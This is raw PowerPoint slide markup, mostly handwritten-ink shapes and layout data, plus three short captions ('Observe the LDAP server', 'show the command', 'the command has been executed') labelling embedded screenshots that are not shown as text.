                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E63A1DD-804E-0B22-82D9-EC57E64E151B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId23"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4850475" y="247560"/>
                  <a:ext cx="43805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FFE6748-9132-53B1-ADC5-76C7D15BF453}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5342200" y="303000"/>
                <a:ext cx="335880" cy="288720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="19" name="Ink 18">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFFE6748-9132-53B1-ADC5-76C7D15BF453}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId25"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5306161" y="267000"/>
                  <a:ext cx="407597"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AC53250B-D6CF-5DF3-A7E8-6B475A8036DD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5861680" y="335040"/>
                <a:ext cx="51480" cy="223920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="20" name="Ink 19">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC53250B-D6CF-5DF3-A7E8-6B475A8036DD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId27"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5825680" y="299040"/>
                  <a:ext cx="1231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079A2768-87FE-06E1-71A4-4FF85C76A1AB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5831440" y="111480"/>
                <a:ext cx="360" cy="6120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="21" name="Ink 20">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{079A2768-87FE-06E1-71A4-4FF85C76A1AB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId29"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5795440" y="75480"/>
                  <a:ext cx="72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B61EEE65-3E49-7CE3-66BC-4B5BDA7FE44A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6044560" y="243600"/>
                <a:ext cx="295920" cy="321840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="23" name="Ink 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B61EEE65-3E49-7CE3-66BC-4B5BDA7FE44A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId31"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6008516" y="207600"/>
                  <a:ext cx="367647"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E7501411-1D0B-18B4-B278-A332912CA9C9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6449560" y="180960"/>
                <a:ext cx="209520" cy="414360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="25" name="Ink 24">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7501411-1D0B-18B4-B278-A332912CA9C9}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId33"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6413560" y="144960"/>
                  <a:ext cx="2811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A6550468-F287-55CB-63A3-C5E6115A4984}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6847720" y="223440"/>
                <a:ext cx="205560" cy="324360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="26" name="Ink 25">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6550468-F287-55CB-63A3-C5E6115A4984}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId35"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6811720" y="187440"/>
                  <a:ext cx="277200" cy="396000"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CF3BB53-7A28-ED2C-6041-F1B447E9F8CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5069320" y="5973720"/>
            <a:ext cx="443880" cy="549000"/>
            <a:chOff x="5069320" y="5973720"/>
            <a:chExt cx="443880" cy="549000"/>
          </a:xfrm>
        </p:grpSpPr>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BB7B8AF2-D6D2-9C53-DB7B-D07771BC9C3C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5069320" y="5980560"/>
                <a:ext cx="219960" cy="542160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="33" name="Ink 32">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB7B8AF2-D6D2-9C53-DB7B-D07771BC9C3C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId37"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5033320" y="5944584"/>
                  <a:ext cx="291600" cy="61375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0C17051B-87E3-B63E-D6E6-CC21BDB071AF}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5354080" y="5973720"/>
                <a:ext cx="159120" cy="82440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="34" name="Ink 33">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C17051B-87E3-B63E-D6E6-CC21BDB071AF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId39"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5318080" y="5937720"/>
                  <a:ext cx="230760" cy="154080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49" name="Group 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0221EBC4-4596-6C8C-4537-7B9242697647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5819920" y="5872560"/>
            <a:ext cx="3618360" cy="564480"/>
            <a:chOff x="5819920" y="5872560"/>
            <a:chExt cx="3618360" cy="564480"/>
          </a:xfrm>
        </p:grpSpPr>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917412C7-1F86-F9C0-328C-F6616133064C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5819920" y="6167400"/>
                <a:ext cx="328320" cy="215640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="36" name="Ink 35">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{917412C7-1F86-F9C0-328C-F6616133064C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId41"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5783920" y="6131400"/>
                  <a:ext cx="3999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B0DF1624-ECBD-C13A-8ADE-F35390B5C394}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6207280" y="6126360"/>
                <a:ext cx="482400" cy="29880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="37" name="Ink 36">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0DF1624-ECBD-C13A-8ADE-F35390B5C394}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId43"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6171253" y="6090360"/>
                  <a:ext cx="554094"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7E7A39B5-A3B4-646B-9D20-D6C5970D0F18}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6421120" y="5963640"/>
                <a:ext cx="83160" cy="415440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="38" name="Ink 37">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E7A39B5-A3B4-646B-9D20-D6C5970D0F18}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId45"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6385120" y="5927640"/>
                  <a:ext cx="1548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353249B5-7FFD-9304-A625-68E3599AA03F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6786880" y="6186840"/>
                <a:ext cx="303840" cy="11520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="39" name="Ink 38">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{353249B5-7FFD-9304-A625-68E3599AA03F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId47"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6750880" y="6150840"/>
                  <a:ext cx="3754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2AEAD442-151B-77B3-3484-C85CEF437BBE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6948880" y="6004680"/>
                <a:ext cx="122040" cy="407520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="40" name="Ink 39">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AEAD442-151B-77B3-3484-C85CEF437BBE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId49"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6912880" y="5968680"/>
                  <a:ext cx="19368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9C86D8E9-FA5A-D38B-D4B6-793C2ED6363E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7323280" y="6142920"/>
                <a:ext cx="352440" cy="211680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="41" name="Ink 40">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C86D8E9-FA5A-D38B-D4B6-793C2ED6363E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId51"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7287280" y="6106920"/>
                  <a:ext cx="4240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256BF7D5-1F68-23B6-4CE6-9AD6D57420CC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7402480" y="6024840"/>
                <a:ext cx="75240" cy="39960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="42" name="Ink 41">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256BF7D5-1F68-23B6-4CE6-9AD6D57420CC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId53"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7366480" y="5988840"/>
                  <a:ext cx="146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BF97782F-F380-FAE6-5CB2-84A8FEB7B834}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7749520" y="6095400"/>
                <a:ext cx="226080" cy="341640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="44" name="Ink 43">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF97782F-F380-FAE6-5CB2-84A8FEB7B834}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId55"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7713463" y="6059400"/>
                  <a:ext cx="297834"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6D0BD544-748E-BF37-1C18-95960E5146E7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8198800" y="5872560"/>
                <a:ext cx="91800" cy="490320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="45" name="Ink 44">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0BD544-748E-BF37-1C18-95960E5146E7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId57"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8162800" y="5836560"/>
                  <a:ext cx="16344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25E15FB2-DA12-C6FD-1226-67DFBF3681DA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8342080" y="6045000"/>
                <a:ext cx="247680" cy="279360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="46" name="Ink 45">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25E15FB2-DA12-C6FD-1226-67DFBF3681DA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId59"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8306080" y="6009000"/>
                  <a:ext cx="3193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A79BB578-26E6-49C3-7FB2-310921CE3B32}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8715760" y="6002520"/>
                <a:ext cx="261720" cy="382680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="47" name="Ink 46">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A79BB578-26E6-49C3-7FB2-310921CE3B32}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId61"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8679809" y="5966520"/>
                  <a:ext cx="333262"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B4731DC6-86DF-D961-F6FD-A5A85EAB8D7F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9194200" y="6055440"/>
                <a:ext cx="244080" cy="270360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="48" name="Ink 47">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4731DC6-86DF-D961-F6FD-A5A85EAB8D7F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId63"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9158200" y="6019488"/>
                  <a:ext cx="315720" cy="341905"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2156313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12D91-1BB6-6634-DEE2-BB1D3DE95B95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="786167" y="2370846"/>
            <a:ext cx="10872774" cy="2952994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B7817D-88F9-C62B-2D53-D89562359451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786167" y="2001514"/>
            <a:ext cx="2509020" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Observe the LDAP server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F5A6AD9-5547-97B7-0E92-7331261D0243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631354" y="4721885"/>
            <a:ext cx="3299749" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>the command has been executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EFDAD2B-9201-0761-B748-AC8EBDBE4B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3641969" y="3592562"/>
            <a:ext cx="2042932" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>show the command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2629662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F2B2-B848-ECED-95A4-565806886427}"/>
